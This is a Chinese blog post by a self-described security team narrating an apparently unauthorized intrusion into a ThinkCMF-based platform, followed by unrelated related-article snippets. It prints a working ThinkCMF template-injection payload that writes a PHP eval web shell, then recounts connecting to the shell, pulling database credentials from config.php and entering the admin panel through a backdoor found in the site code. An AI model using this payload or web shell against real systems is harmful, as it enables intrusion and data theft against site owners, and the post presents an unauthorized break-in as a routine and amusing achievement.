渗透小计之「竟然有人在wangle平台代码里下毒」

访客4年前黑客工具761

print by 猩猩安全团队——作者:hurnme、flyingdemon

引言

记一次对某网D平台的渗透,以及发现其后台源码存在后门的过程

确定目标CMS

拿到其ip之后先信息搜集搜了了一波,确定目标使用的是ThinkCMF。

进去之后在url处构造报错

写入一句话

查看到ThinkPHP版本崴3.2.3,那么对应的thinkCMF版本应该存在前台getshell的洞。废话不多说,直接构造payload一发入魂。

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[" ***  *** 521"]);?>')</php>

写入shell之后连接蚁剑,直接拿下

鄙人在渗透的过程中一直有一个习惯,那就是无论如何都要拿到后台管理员权限,不拿后台权限就浑身不得劲,即使拿下了主机,也是吃嘛嘛不香。没拿到后台就拿下主机,那和没确定关系就 *** 有什么区别!

进入♂后台

一开始的思路是读取其config.php文件连接他的数据库,在拿到了数据库账号和密码的时候怎么连也连不上去,小伙伴提供了另一条思路,修改后台登录逻辑,直捣黄龙。

正在我要修改后台登录逻辑的时,浏览代码的过程中无意之中发现了一个好玩的线索。

这。。。这TM。。。有人在代码里下毒。

拿着不知道是哪位好心人留下的后门,含泪登录了后台。

帮这个主机免费做了一次入侵检测,没有发现我们进入之前被入侵的痕迹,盲猜可能是这个平台自带后门。


相关文章

张文宏说北京疫情只是小范围反弹 张文宏还说了什么?

昨晚,央视新闻《相对论》“七一”特辑连线武汉金银潭医院院长张定宇、呼吸与危重症专家童朝晖、上海新冠肺炎专家治疗组组长张文宏,三位专家罕见同框,共同研判疫情新走势,一同追忆青春。 谈疫情 北京精准防...

黑客不会入侵支付宝和微信吗(黑客不会入侵支付宝和微信吗为什么)

黑客不会入侵支付宝和微信吗(黑客不会入侵支付宝和微信吗为什么)

本文目录一览: 1、手机里的木马病毒真的能攻击支付宝、微信和中国银行等软件吗?造成财产安全?网络专家请回答 2、支付宝里存的都是钱,为什么黑客不攻支付宝呢? 3、现在的微信支付宝还会不会被恶意...

派出所可以查到外省开房记录-高效 如何查询老婆

北京时间5月17日消息,据《纽约时报》报道,一家叫Securus的科技公司帮助监狱监听犯人与律师的通话,数量至少有14000通,如果调查者需要,它能提供信息。但现在有黑客从Securus窃取大量数据,...

黑客帝国3解说完整版(分钟看完黑客帝国3)

黑客帝国3解说完整版(分钟看完黑客帝国3)

本文目录一览: 1、黑客帝国3最后大结局到底怎么了?看不懂,史密斯怎么一下全死光了 2、黑客帝国1,2,3的剧情详细介绍! 3、《黑客帝国3》结局解析是什么? 4、黑客帝国1,2,3讲的是...

数据价值变现的6种模式,你PICK哪一种?

数据价值变现的6种模式,你PICK哪一种?

编辑导语:2012年,马云在网商大会上震耳发聩地喊出:我们将进入大数据时代,这是中国大数据行业开始发作的信号弹。当大数据应用在差异的规模和差异的场景下,所发生的意义及其所代表的意义也都纷歧样。大数据是...

水当当奶茶加盟店怎么样?一个值得加盟的好品牌

水当当奶茶加盟店怎么样?一个值得加盟的好品牌

奶茶行业一直以来都是饮品行业中最受接待的行业之一,所以很多的加盟投资者就看中了奶茶行业,一时间掀起一股加盟奶茶行业的高潮,与此同时,奶茶行业之间的竞争也是越来越大,所以列位加盟者选择一个好的加盟品牌就...